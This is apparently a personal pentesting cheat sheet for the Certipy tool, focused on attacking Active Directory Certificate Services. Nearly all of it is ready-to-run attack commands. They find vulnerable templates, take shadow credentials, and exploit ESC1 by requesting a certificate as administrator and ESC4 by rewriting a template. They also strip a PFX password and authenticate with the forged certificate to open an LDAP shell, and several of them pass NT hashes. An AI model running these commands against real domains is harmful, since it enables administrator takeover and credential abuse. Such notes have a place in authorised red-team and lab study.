# certipy

#### Find Vulnerable Template

* Find vulnerable template

```bash
certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51  
certipy find -u 'billy@foobar.com' -p <password> -dc-ip <DC_IP> -vulnerable -enabled
certipy find -u 'user@domain.local' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51   

```

#### Shadow Credential

* Get Shadow credentials

```bash
certipy-ad shadow auto -u 'user@domain.local' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51' 
```

#### ESC1

* Exploit `ESC1`

```bash
certipy-ad req -u user -target domain.local -upn administrator@domain.local -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51
```

```bash
certipy-ad req -u user -target domain.local -web -port 80 -subject 'DIstinguishedName' -sid 'SID -debug' -ca sequel-DC01-CA -template template_name -target-ip <ip_ca>

```

#### ESC4

* Exploit `ESC4`

```bash
certipy template -username user@domain.local  -hashes 3b181b914e7a9d5508ea1e20bc2b7fce  -template templateName  -save-old 
```

```bash
certipy template -username user@domain.local  -p -dc-ip ip_dc -template templateName  -save-old  -configuration configuration.json

```

#### Using PFXS withou password

* Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

```bash
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
```

#### Auth using pfx

```bash
certipy auth -pfx administrator.pfx -domain domain.local

```

```bash
certipy auth -pfx administrator.pfx -domain domain.local --ldap-shell
```

#### Bloodhound

```bash
certipy find -u '[email protected]' -p 'Password123!' -dc-ip 10.129.205.199 -bloodhound
```

### Risorse

* <https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate>
* <https://github.com/ly4k/Certipy/blob/main/README.md>